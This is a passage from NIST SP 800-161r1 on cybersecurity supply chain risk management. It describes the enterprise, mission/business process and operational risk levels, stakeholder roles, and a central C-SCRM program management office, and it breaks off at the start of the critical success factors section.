PRACTICES FOR SYSTEMS AND ORGANIZATIONS
22
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
2.3.
Multilevel Risk Management18
To integrate risk management throughout an enterprise, [NIST SP 800-39] describes three levels,
depicted in Figure 2-3, that address risk from different perspectives: 1) the enterprise-level, 2)
the mission and business process level, and 3) the operational level. C-SCRM requires the
involvement of all three levels.
Fig. 2-3: Multilevel Enterprise-Wide Risk Management19
In multilevel risk management, the C-SCRM process is seamlessly carried out across the three
tiers with the overall objective of continuous improvement in the enterprise’s risk-related
activities and effective inter- and intra-level communication among stakeholders with a vested
interest in C-SCRM.
C-SCRM activities can be performed by a variety of individuals or groups within an enterprise,
ranging from a single individual to committees, divisions, centralized program offices, or any
other enterprise structure. C-SCRM activities are distinct for different enterprises depending on
their structure, culture, mission, and many other factors. C-SCRM activities at each of the three
levels include the production of different high-level C-SCRM deliverables.
• At Level 1 (Enterprise), the overall C-SCRM strategy, policy, and implementation plan
set the tone, governance structure, and boundaries for how C-SCRM is managed across
the enterprise and guide C-SCRM activities performed at the mission and business
process levels.
18 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
19 Additional information about the concepts depicted in Figure 2-2 can be found in [NIST SP 800-39].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
23
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• At Level 2 (Mission and Business Process), the mid-level C-SCRM strategies, policies,
and implementation plans assume the context and direction set forth at the enterprise
level and tailor it to the specific mission and business process.
• At Level 3 (Operational), the C-SCRM plans provide the basis for determining whether
an information system meets business, functional, and technical requirements and
includes appropriately tailored controls. These plans are heavily influenced by the context
and direction provided by Level 2.
Figure 2-4 provides an overview of the multilevel risk management structure and the associated
strategies, policies, and plans developed at each level. Refer to Sections 2.3.1 through 2.3.5 for a
more in-depth discussion of the specific activities at each level.
Fig. 2-4: C-SCRM Documents in Multilevel Enterprise-wide Risk Management
2.3.1. Roles and Responsibilities Across the Three Levels
Implementing C-SCRM requires enterprises to establish a coordinated team-based approach and
a shared responsibility model to effectively manage cybersecurity risks throughout the supply
chain. Enterprises should establish and adhere to C-SCRM-related policies, develop and follow
processes (often cross-enterprise in nature), and employ programmatic and technical mitigation
techniques. The coordinated team approach, either ad hoc or formal, enables enterprises to
effectively conduct a comprehensive, multi-perspective analysis of their supply chain and to
respond to risks, communicate with external partners/stakeholders, and gain broad consensus
regarding appropriate resources for C-SCRM. The C-SCRM team should work together to make
decisions and take actions deriving from the input and involvement of multiple perspectives and
expertise. The team leverages but does not replace those C-SCRM responsibilities and processes
that should be specifically assigned to an individual enterprise or disciplinary area. Effective
implementations of C-SCRM often include the adoption of a shared responsibility model, which
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
24
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
distributes responsibilities and accountabilities for C-SCRM-related activities and risk across a
diverse group of stakeholders. Examples of C-SCRM activities in which enterprises benefit from
a multidisciplinary approach include developing a strategic sourcing strategy, incorporating C-
SCRM requirements into a solicitation, and determining options for how best to mitigate an
identified supply chain risk, especially one assessed to be significant.
Members of the C-SCRM team should be a diverse group of people involved in the various
aspects of the enterprise’s critical processes, such as information security, procurement,
enterprise risk management, engineering, software development, IT, legal, and HR. To aid in C-
SCRM, these individuals should provide expertise in enterprise processes and practices specific
to their discipline area and an understanding of the technical aspects and inter-dependencies of
systems or information flowing through systems. The C-SCRM team may be an extension of an
enterprise’s existing enterprise risk management function, grown as part of an enterprise’s
cybersecurity risk management function, or operate out of a different department.
The key to forming multidisciplinary C-SCRM teams is breaking down barriers between
otherwise disparate functions within the enterprise. Many enterprises begin this process from the
top by establishing a working group or council of senior leaders with representation from the
necessary and appropriate functional areas. A charter should be established outlining the goals,
objectives, authorities, meeting cadences, and responsibilities of the working group. Once this
council is formed, decisions can be made on how to operationalize the interdisciplinary approach
at mission and business process and operational levels. This often takes the form of working
groups that consist of mission and business process representatives who can meet at more regular
cadences and address more operational and tactically focused C-SCRM challenges.
Table 2-1 shows a summary of C-SCRM stakeholders for each level with the specific C-SCRM
activities performed within the corresponding level. These activities are either direct C-SCRM
activities or have an impact on C-SCRM.
Table 2-1: Cybersecurity Supply Chain Risk Management Stakeholders20
Levels
Level Name
Generic Stakeholder
Activities
1
Enterprise
Executive Leadership:
CEO, CIO, COO, CFO, CISO,
Chief Technology Officer (CTO),
Chief Acquisition Officer (CAO),
Chief Privacy Officer (CPO),
CRO, etc.
• Define Enterprise C-
SCRM strategy.
• Form governance
structures and operating
model.
• Frame risk for the
enterprise, and set the
tone for how risk is
managed (e.g., set risk
appetite).
20 Small and mid-sized businesses may not see such a high-degree of differentiation in their C-SCRM stakeholders.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
25
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Level Name
Generic Stakeholder
Activities
• Define high-level
implementation plan,
policy, goals, and
objectives.
• Make enterprise-level C-
SCRM Decisions.
• Form a C-SCRM PMO.
2
Mission and
Business
Process
Business Management:
Program management [PM],
project managers, integrated
project team (IPT) members,
research and development (R&D),
engineering (SDLC oversight),
acquisition and supplier
relationship management/cost
accounting, and other
management related to reliability,
safety, security, quality, the C-
SCRM PMO, etc.
• Develop mission and
business process-specific
strategy.
• Develop policies and
procedures, guidance,
and constraints.
• Reduce vulnerabilities at
the onset of new IT
projects and/or related
acquisitions.
• Review and assess
system, human, or
organizational flaws that
expose business,
technical, and acquisition
environments to cyber
threats and attacks.
• Develop C-SCRM
implementation plan(s).
• Tailor the enterprise risk
framework to the mission
and business process
(e.g., set risk tolerances).
• Manage risk within
mission and business
processes.
• Form and/or collaborate
with a C-SCRM PMO.
• Report on C-SCRM to
Level 1 and act on
reporting from Level 3.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
26
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Levels
Level Name
Generic Stakeholder
Activities
3
Operational
Systems Management:
Architects, developers, system
owners, QA/QC, testing,
contracting personnel, C-SCRM
PMO staff, control engineer
and/or control system operator,
etc.
• Develop C-SCRM plans.
• Implement C-SCRM
policies and
requirements.
• Adhere to constraints
provided by Level 1 and
Level 2.
• Tailor C-SCRM to the
context of the individual
system, and apply it
throughout the SDLC.
• Report on C-SCRM to
Level 2.
The C-SCRM process should be carried out across the three risk management levels with the
overall objective of continuous improvement of the enterprise’s risk-related activities and
effective inter- and intra-level communication, thus integrating both strategic and tactical
activities among all stakeholders with a shared interest in the mission and business success of the
enterprise. Whether addressing a component, system, process, mission process, or policy, it is
important to engage the relevant C-SCRM stakeholders at each level to ensure that risk
management activities are as informed as possible. Figure 2-5 illustrates the relationship between
key C-SCRM documents across the three levels.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
27
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. 2-5: Relationship Between C-SCRM Documents
The next few sections provide example roles and activities at each level. Because every
enterprise is different, however, activities may be performed at different levels than listed and as
individual enterprise context requires.
2.3.2. Level 1 – Enterprise
Effective C-SCRM requires commitment, direct involvement, and ongoing support from senior
leaders and executives. Enterprises should designate the responsibility for leading agency-wide
SCRM activities to an executive-level individual, office (supported by an expert staff), or group
(e.g., a risk board, executive steering committee, or executive leadership council) regardless of
an agency’s specific organizational structure. Because cybersecurity risks throughout the supply
chain can be present across every major business line, enterprises should ensure that C-SCRM
Appendix A provides a number of mission and business C-SCRM controls that organizations
can utilize in a tailored capacity to help guide Level 1, Level 2, and Level 3 C-SCRM
activities. Note that the tailoring should be scoped to the organization’s risk management
needs, and organizations should analyze the cost of not implementing C-SCRM policies,
capabilities, and controls when evaluating alternative risk response courses of action. These
costs may include poor quality or counterfeit products, supplier misuse of intellectual
property, supplier tampering with or compromise of mission-critical information, and
exposure to cyber attacks through vulnerable supplier information systems.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
28
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
roles and responsibilities are defined for senior leaders who participate in supply chain activities
(e.g., acquisition and procurement, information security, information technology, legal, program
management, and supply chain and logistics). Without establishing executive oversight of C-
SCRM activities, enterprises are limited in their ability to make risk decisions across the
organization about how to effectively secure their product and services.
Level 1 (Enterprise) sets the tone and direction for enterprise-wide C-SCRM activities by
providing an overarching C-SCRM strategy, a C-SCRM policy, and a High-level
Implementation Plan that shapes how C-SCRM is implemented across the enterprise. Within
Level-1, governance structures are formed to enable senior leaders and executives to collaborate
on C-SCRM with the risk executive (function), make C-SCRM decisions, delegate decisions to
Level 2 and Level 3, and prioritize enterprise-wide resource allocation for C-SCRM. Level 1
activities help to ensure that C-SCRM mitigation strategies are consistent with the strategic goals
and objectives of the enterprise. Level 1 activities culminate in the C-SCRM Strategy, Policy,
and High-Level Implementation Plan that shape and constrain how C-SCRM is carried out at
Level 2 and Level 3.
C-SCRM requires accountability, commitment, oversight, direct involvement, and ongoing
support from senior leaders and executives. Enterprises should ensure that C-SCRM roles and
responsibilities are defined for senior leaders who participate in supply chain activities (e.g.,
acquisition and procurement, information security, information technology, legal, program
management, and supply chain and logistics). At Level 1, an executive board is typically
responsible for evaluating and mitigating all risks across the enterprise. This is generally
achieved through an Enterprise Risk Management (ERM) council. Effective C-SCRM gathers
perspectives from leaders, all generally within the ERM council – such as the chief executive
officer (CEO), chief risk officer (CRO), chief information officer (CIO), chief legal officer
(CLO)/general counsel, chief information security officer (CISO), and chief acquisition officer
(CAO) – and informs advice and recommendations from the CIO and CISO to the executive
board.
CIOs and/or CISOs may form a C-SCRM oriented-body to provide in-depth analysis to inform
the executive board’s ERM council. The C-SCRM council serves as a forum for setting priorities
and managing cybersecurity risk in the supply chain for the enterprise. The C-SCRM council or
Ownership and accountability for cybersecurity risks in the supply chain ultimately lie with
the head of the organization.
• Decision-makers are informed by an organization’s risk profile, risk appetite, and risk
tolerance levels. Processes should address when and how the escalation of risk
decisions needs to occur.
• Ownership should be delegated to authorizing officials within the agency based on
their executive authority over organizational missions, business operations, or
information systems.
• Authorizing officials may further delegate responsibilities to designated officials who
are responsible for the day-to-day management of risk.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
29
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
other C-SCRM-oriented body are responsible for developing the C-SCRM enterprise-wide
strategy. The C-SCRM strategy makes explicit the enterprise’s assumptions, constraints, risk
tolerances, and priorities/trade-offs as established by the ERM council. C-SCRM is integrated
into the organization’s overall enterprise risk management through the CIO and/or CISO
membership within the executive board’s ERM council.
These leaders are also responsible and accountable for developing and promulgating a holistic
set of policies that span the enterprise’s mission and business processes, guiding the
establishment and maturation of a C-SCRM capability and the implementation of a cohesive set
of C-SCRM activities. Leaders should establish a C-SCRM PMO or other dedicated C-SCRM-
related function to drive C-SCRM activities and serve as a fulcrum for coordinated, C-SCRM-
oriented services and guidance to the enterprise. Leaders should also clearly articulate the lead
roles at the mission and business process level that are responsible and accountable for detailing
action plans and executing C-SCRM activities. Enterprises should consider that without
establishing executive oversight of C-SCRM activities, enterprises are limited in their ability to
make risk decisions across the organization about how to effectively secure their product and
services.
The C-SCRM governance structures and operational model dictate the authority, responsibility,
and decision-making power for C-SCRM and define how C-SCRM processes are accomplished
within the enterprise. The best C-SCRM governance and operating model is one that meets the
business and functional requirements of the enterprise. For example, an enterprise facing strict
budgetary constraints or stiff C-SCRM requirements may consider governance and operational
models that centralize the decision-making authority and rely on a C-SCRM PMO to consolidate
responsibilities for resource-intensive tasks, such as vendor risk assessments. In contrast,
enterprises that have mission and business processes governed with a high degree of autonomy
or that possess highly differentiated C-SCRM requirements may opt for decentralized authority,
responsibilities, and decision-making power.
In addition to defining C-SCRM governance structures and operating models, Level 1 carries out
the activities necessary to frame C-SCRM for the enterprise. C-SCRM framing is the process by
which the enterprise makes explicit the assumptions about cybersecurity risks throughout the
supply chain (e.g., threats, vulnerabilities, risk impact,21 risk likelihood), constraints (e.g.,
enterprise policies, regulations, resource limitation, etc.), appetite and tolerance, and priorities
and trade-offs that guide C-SCRM decisions across the enterprise. The risk framing process
provides the inputs necessary to establish the C-SCRM strategy that dictates how the enterprise
plans to assess, respond to, and monitor cybersecurity risks throughout the supply chain. A high-
level implementation plan should also be developed to guide the execution of the enterprise’s C-
SCRM strategy. The risk framing process is discussed in further detail in Appendix C.
Informed by the risk framing process and the C-SCRM strategy, Level 1 provides the
enterprise’s C-SCRM policy. The C-SCRM policy establishes the C-SCRM program’s purpose,
outlines the enterprise’s C-SCRM responsibilities, defines and grants authority to C-SCRM roles
across the enterprise, and outlines applicable C-SCRM compliance and enforcement expectations
21 Risk impact refers to the effect on organizational operations, organizational assets, individuals, other organizations, or the Nation (including the
national security interests of the United States) of a loss of confidentiality, integrity, or availability of information or a system [800-53 R5].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
30
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
and processes. Appendix C provides example templates for the C-SCRM Strategy and C-SCRM
Policy.
Risk assessment activities performed at Level 1 focus on assessing, responding to, and
monitoring cybersecurity risks throughout the supply chain. Level 1 risk assessments may be
based on the enterprise’s Level 1 Frame step (i.e., assumptions, constraints, appetite, tolerances,
priorities, and trade-offs) or may be aggregated enterprise-level assumptions based on risk
assessments that are completed across multiple mission and business processes. For example, a
Level 1 risk assessment may assess the exposure to threats to enterprise objectives that arise
through supply chain products or services. Level 1 risk assessments may also aim to aggregate
and recontextualize risk assessments completed at Level 2 to describe risk scenarios against the
enterprise’s primary objectives.
Reporting plays an important role in equipping Level 1 decision-makers with the context
necessary to make informed decisions on how to manage cybersecurity risks throughout the
supply chain. Reporting should focus on enterprise-wide trends and include coverage of the
extent to which C-SCRM has been implemented across the enterprise, the effectiveness of C-
SCRM, and the conditions related to cybersecurity risks throughout the supply chain. C-SCRM
reports should highlight any conditions that require urgent leadership attention and/or action and
may benefit from highlighted C-SCRM risk and performance trends over a period of time. Those
responsible and accountable for C-SCRM within the enterprise should work with leaders to
identify reporting requirements, such as frequency, scope, and format. Reporting should include
metrics discussed further in Section 3.5.1.
Level 1 activities ultimately provide the overarching context and boundaries within which the
enterprise’s mission and business processes manage cybersecurity risks throughout the supply
chain. Outputs from Level 1 (e.g., C-SCRM Strategy, C-SCRM Policy, Governance, and
Operating Model) are further tailored and refined within Level 2 to fit the context of each
mission and business process. Level 1 outputs should also be iteratively informed by and updated
as a result of C-SCRM outputs at lower levels.
Note that, in complex enterprises, Level 1 activities may be completed at an enterprise level and
at an individual organization level. Enterprise Level 1 activities should shape and guide
Organization Level 1 activities.
Additional information can be found in Appendix A of this document and SR-1, SR-3, PM-2,
PM-6, PM-7, PM-9, PM-28, PM-29, PM-30, and PM-31 of NIST SP 800-53, Rev. 5.
2.3.3. Level 2 – Mission and Business Process
Level 2 addresses how the enterprise mission and business processes assess, respond to, and
monitor cybersecurity risks throughout the supply chain. Level 2 activities are performed in
accordance with the C-SCRM strategy and policies provided by Level 1.22 In this level, process-
specific C-SCRM strategies, policies, and implementation plans dictate how the enterprise’s C-
22 For more information, see [NIST SP 800-39, Section 2.2].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
31
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SCRM goals and requirements are met within each mission and business process. Here, specific
C-SCRM program requirements are defined and managed and include cost, schedule,
performance, security, and a variety of critical non-functional requirements. These non-
functional requirements include concepts such as reliability, dependability, safety, security, and
quality.
Level 2 roles include representatives of each mission and business process, such as program
managers, research and development, and acquisitions/procurement. Level 2 C-SCRM activities
address C-SCRM within the context of the enterprise’s mission and business process. Specific
strategies, policies, and procedures should be developed to tailor the C-SCRM implementation to
fit the specific requirements of each mission and business process. In order to further develop the
high-level Enterprise Strategy and Implementation Plan, different mission areas or business lines
within the enterprise may need to generate their own tailored mission and business-level strategy
and implementation plan, and they should ensure that C-SCRM execution occurs within the
constraints defined by higher level C-SCRM strategies and in conformance C-SCRM policies.
To facilitate the development and execution of Level 2 Strategy and Implementation plans,
enterprises may benefit from forming a committee with representation from each mission and
business process. Coordination and collaboration between the mission and business processes
can help drive risk awareness, identify cybersecurity risks throughout the supply chain, and
support the development of an enterprise and C-SCRM architecture. A C-SCRM PMO may also
assist in the implementation of C-SCRM at Level 2 through the provision of services (e.g., policy
templates, C-SCRM subject matter expert [SME] support).
Many threats to and through the supply chain are addressed at Level 2 in the management of
third-party relationships with suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers. Because C-SCRM can both directly and
indirectly impact mission processes, understanding, integrating, and coordinating C-SCRM
activities at this level are critical. Level 2 activities focus on tailoring and applying the
enterprise’s C-SCRM frame to fit the specific mission and business process threats,
vulnerabilities, impacts,23 and likelihoods. Informed by outputs from Level 1 (e.g., C-SCRM
strategy), mission and business processes will adopt a C-SCRM strategy that tailors the
enterprise’s overall strategy to a specific mission and business process. At Level 2, the enterprise
may also issue mission and business process-specific policies that contextualize the enterprise’s
policy for the process.
In accordance with the C-SCRM strategy, enterprise leaders for specific mission and business
processes should develop and execute a C-SCRM implementation plan. The C-SCRM
implementation plan provides a more detailed roadmap for operationalizing the C-SCRM
strategy within the mission and business process. Within the C-SCRM implementation plans, the
mission and business process will specify C-SCRM roles, responsibilities, implementation
milestones, dates, and processes for monitoring and reporting. Appendix D of this document
23 These impacts refer to the effects on organizational operations, organizational assets, individuals, other organizations, or the Nation (including
the national security interests of the United States) of a loss of confidentiality, integrity, or availability of information or a system [SP 800-53,
Rev. 5].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
32
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
provides example templates for the C-SCRM Strategy, Implementation Plan, and the C-SCRM
Policy.
C-SCRM activities performed at Level 2 focus on assessing, responding to, and monitoring risk
exposure arising from the mission and business process dependencies on suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service
providers. Risk exposures to the supply chain may occur as a result of primary dependencies on
the supply chain or secondary dependencies on individual information systems or other mission
and business processes. For example, risk exposure may arise due to a supplier providing critical
system components or services to multiple information systems on which critical processes
depend. Risk may also arise from vendor-sourced products and services unrelated to information
systems, as well as the roles that these products and services play in the overall mission and
business process objectives. Enterprises should consider non-traditional sources of cybersecurity
risks throughout the supply chain. These risks may circumvent or escape C-SCRM processes,
such as those arising from the use of open source software. Enterprises should establish policies
and controls to manage non-traditional cybersecurity risks throughout the supply chain.
Reporting at Level 2 plays an important role in equipping mission and business process leaders
with the context necessary to manage C-SCRM within the scope of their mission and business
processes. Topics covered at Level 2 will reflect those covered at Level 1 but should be reshaped
to focus on the specific mission and business process that they correspond to. Level 2 reporting
should include metrics that demonstrate the mission and business process performance in
contrast to the enterprise-defined risk appetite and risk tolerance statements defined at Level 1
and Level 2. Reporting requirements should be defined to fit the needs of leaders in mission and
business processes and at Level 1.
Outputs from Level 2 activities will significantly impact how C-SCRM activities are carried out
at Level 3. For example, risk tolerance and common control baseline decisions may be defined at
Level 2 then tailored and applied within the context of individual information systems at Level 3.
Level 2 outputs should also be used to iteratively influence and further refine Level 1 outputs.
Additional information can be found in Appendix A of this document and SR-1, SR-3, SR-6, PM-
2, PM-6, PM-7, PM-30, PM-31, and PM-32 of NIST SP 800-53, Rev. 5.
2.3.4. Level 3 – Operational
Level 3 is comprised of personnel responsible and accountable for operational activities,
including conducting procurements and executing system-related C-SCRM activities as part of
the enterprise’s SDLC, which includes research and development, design, manufacturing,
delivery, integration, operations and maintenance, and the disposal/retirement of systems. These
personnel include system owners, contracting officers, contracting officer representatives,
architects, system engineers, information security specialists, system integrators, and developers.
These personnel are responsible for developing C-SCRM plans that address the management,
implementation assurance, and monitoring of C-SCRM controls (to include those applicable to
external parties, such as contractors) and the acquisition, development, and sustainment of
systems and components across the SDLC to support mission and business processes. In
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
33
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
enterprises where a C-SCRM PMO has been established, activities such as product risk
assessments may be provided as a centralized, shared service.
Within Level 3, outputs provided by C-SCRM activities completed at Level 1 and Level 2
prepare the enterprise to execute C-SCRM at the operational level in accordance with the RMF
[NIST 800-37r2]. C-SCRM is applied to information systems through the development and
implementation of C-SCRM plans. These plans are heavily influenced by assumptions,
constraints, risk appetite and tolerance, priorities, and trade-offs defined by Level 1 and Level 2.
C-SCRM plans dictate how C-SCRM activities are integrated into all systems in the SDLC:
acquisition (both custom and off-the-shelf), requirements, architectural design, development,
delivery, installation, integration, maintenance, and disposal/retirement. In general, C-SCRM
plans are implementation-specific and provide policy implementation, requirements, constraints,
and implications for systems that support mission and business processes.
Level 3 activities focus on managing operational-level risk exposure resulting from any ICT/OT-
related products and services provided through the supply chain that are in use by the enterprise
or fall within the scope of the systems authorization boundary. Level 3 C-SCRM activities begin
with an analysis of the likelihood and impact of potential supply chain cybersecurity threats
exploiting an operational-level vulnerability (e.g., in a system or system component). Where
applicable, these risk assessments should be informed by risk assessments completed in Level 1
and Level 2. In response to determining risk, enterprises should evaluate alternative courses of
action for reducing risk exposure (e.g., accept, avoid, mitigate, share, and/or transfer). Risk
response is achieved by selecting, tailoring, implementing, and monitoring C-SCRM controls
throughout the SLDC in accordance with the RMF [NIST 800-37r2]. Selected C-SCRM controls
often consist of a combination of inherited common controls from the Level 1 and Level 2 and
information system-specific controls at Level 3.
Reporting at Level 3 should focus on the C-SCRM’s implementation, efficiency, effectiveness,
and the overall level of exposure to cybersecurity risks in the supply chain for the particular
system. System-level reporting should provide system owners with tactical-level insights that
enable them to make rapid adjustments and respond to risk conditions. Level 3 reporting should
include metrics that demonstrate performance against the enterprise risk appetite statements and
risk tolerance statements defined at Levels 1, 2, and 3.
A critical Level 3 activity is the development of the C-SCRM plan. Along with applicable
security control information, the C-SCRM plan includes information on the system, its
categorization, operational status, related agreements, architecture, critical system personnel,
related laws, regulations, policies, and contingency plan. In C-SCRM, continuous hygiene is
critical, and the C-SCRM plan is a living document that should be maintained and used as the
reference for the continuous monitoring of implemented C-SCRM controls. C-SCRM plans are
intended to be referenced regularly and should be reviewed and refreshed periodically. These are
not intended to be documents developed to satisfy a compliance requirement. Rather, enterprises
should be able to demonstrate how they have historically and continue to effectively employ
their plans to shape, align, inform, and take C-SCRM actions and decisions across all three
levels.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
34
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Information gathered as part of Level 3 C-SCRM activities should iteratively inform C-SCRM
activities completed within Level 1 and Level 2 to further refine C-SCRM strategies and
implementation plans.
Additional information can be found in Appendix A of this document and SR-1, SR-2, SR-6, PL-2,
PM-31, and PM-32 of NIST SP 800-53, Rev. 5.
2.3.5. C-SCRM PMO
A variety of operating models (e.g., centralized, decentralized, hybrid) facilitate C-SCRM
activities across the enterprise and its mission and business processes. One such model involves
concentrating and assigning responsibilities for certain C-SCRM activities to a central PMO. In
this model, the C-SCRM PMO acts as a service provider to other mission and business
processes. Mission and business processes are then responsible for selecting and requesting
services from the C-SCRM PMO as part of their responsibilities to meet the enterprise’s C-
SCRM goals and objectives. There are a variety of beneficial services that a PMO may provide:
• Advisory services and subject matter expertise
• Chair for internal C-SCRM working groups, council, or other coordination bodies
• Centralized hub for tools, job aids, awareness, and training templates
• Supplier and product risk assessments
• Liaison to external stakeholders
• Information-sharing management (e.g., intra department/agency and to/from FASC)
• Management of C-SCRM risk register
• Secretariat/staffing function for enterprise C-SCRM governance
• C-SCRM project and performance management
• C-SCRM briefings, presentations, and reporting
A C-SCRM PMO typically consists of C-SCRM SMEs who help drive the C-SCRM strategy
and implementation across the enterprise and its mission and business processes. A C-SCRM
PMO may include or report to a dedicated executive-level official responsible and accountable
for overseeing C-SCRM activities across the enterprise. A C-SCRM PMO should consist of
dedicated personnel or include matrixed representatives with responsibilities for C-SCRM from
several of the enterprise’s processes, including information security, procurement, risk
management, engineering, software development, IT, legal, and HR. Regardless of whether a C-
SCRM PMO sits at Level 1 or Level 2, it is critical that the C-SCRM PMO include cross-
disciplinary representation.
The C-SCRM PMO responsibilities may include providing services to the enterprise’s leaders
that help set the tone for how C-SCRM is applied throughout the enterprise. The C-SCRM PMO
may provide SME support to guide Level 1 stakeholders through the risk framing process, which
includes establishing the enterprise appetite and tolerance for cybersecurity risks throughout the
supply chain. In addition, accountable risk executives may delegate the responsibility of drafting
the enterprise’s C-SCRM strategy and policy to the PMO. C-SCRM PMOs may also coordinate
C-SCRM information-sharing internally or with external entities. Finally, the PMO may conduct
C-SCRM-focused executive-level briefings (e.g., to the risk executive function, board of
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
35
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
directors) to help Level 1 stakeholders develop an aggregated view of cybersecurity risks
throughout the supply chain.
At Level 2, the C-SCRM PMO may develop C-SCRM starter kits that contain a base strategy
and a set of policies, procedures, and guidelines that can be further customized within specific
mission and business processes. This PMO may also provide SME consulting support to
stakeholders within mission and business processes as they create process-specific C-SCRM
strategies and develop C-SCRM implementation plans. As part of this responsibility, the C-
SCRM PMO may advise on or develop C-SCRM common control baselines within the enterprise
mission and business processes. The C-SCRM PMO may also perform C-SCRM risk
assessments focused on suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers of both technology- and non-technology-
related products and services.
The responsibility of a C-SCRM PMO at Level 1 and Level 2 would ultimately influence C-
SCRM activities at the Level 3 operational level. A C-SCRM PMO may advise teams throughout
the SDLC on C-SCRM control selection, tailoring, and monitoring. Ultimately a C-SCRM PMO
may be responsible for activities that produce C-SCRM outputs across the risk management
levels. Centralizing C-SCRM services offers enterprises an opportunity to capitalize on
specialized skill sets within a consolidated team that offers high-quality C-SCRM services to the
rest of the enterprise. By centralizing risk assessment services, enterprises may achieve a level of
standardization not otherwise possible (e.g., in a decentralized model). Enterprises may also
realize cost efficiencies in cases where PMO resources are dedicated to C-SCRM activities
versus resources in decentralized models that may perform multiple roles in addition to C-SCRM
responsibilities.
A C-SCRM PMO model will typically favor larger, more complex enterprises that require the
standardization of C-SCRM practices across a disparate set of mission and business processes.
Ultimately, enterprises should select a C-SCRM operating model that is applicable and
appropriate relative to their available resources and context.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
36
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Key Takeaways24
Business Case for C-SCRM. C-SCRM provides enterprises with a number of benefits, such as
an understanding of critical systems, the reduced likelihood of supply chain compromise,
operational and enterprise efficiencies, fewer product quality and security issues, and more
reliable and trustworthy supplied services.
Cybersecurity Risk in Supply Chains. The potential for harm or compromise arising from a
relationship with suppliers, their supply chains, and their supplied products or services
materialize when a human or non-human threat successfully exploits a vulnerability tied to a
system, product, service, or the supply chain ecosystem.
Multilevel, Multidisciplinary C-SCRM. As described in [NIST SP 800-39], multilevel risk
management is the purposeful execution and continuous improvement of cybersecurity supply
chain risk management activities at the enterprise (e.g., CEO, COO), mission and business
process (e.g., business management, R&D), and operational (e.g., systems management) levels.
Each level contains stakeholders from multiple disciplines (e.g., information security,
procurement, enterprise risk management, engineering, software development, IT, legal, HR,
etc.) that collectively execute and continuously improve C-SCRM
C-SCRM PMO. A dedicated office known as a C-SCRM PMO may support the enterprise’s C-
SCRM activities by providing support products (e.g., policy templates) and services (e.g., vendor
risk assessments) to the rest of the enterprise. A C-SCRM PMO may provide support across the
three levels and sit at Level 1 or Level 2, depending on the enterprise.
C-SCRM is a Life Cycle Process. C-SCRM activities should be integrated and executed
throughout the applicable enterprise life cycle processes (e.g., SDLC). For example in systems,
cybersecurity supply chain risks can and do materialize during operations and maintenance
phases. Organizations should ensure that appropriate C-SCRM activities are in place to assess,
respond to, and monitor cybersecurity supply chain risks on a continuous basis.
24 Key takeaways describe key points from the section text. Refer to the Glossary in Appendix H for definitions.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
37
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
CRITICAL SUCCESS FACTORS
To successfully address evolving cybersecurity risks throughout the supply chain, enterprises
need to engage multiple internal processes and capabilities, communicate and collaborate across
enterprise levels and mission areas, and ensure that all individuals within the enterprise
understand their role in managing cybersecurity risks throughout the supply chain. Enterprises
need strategies for communicating, determining how best to implement, and monitoring the
effectiveness of their supply chain cybersecurity controls and practices. In addition to internally
communicating cybersecurity supply chain risk management controls, enterprises should engage
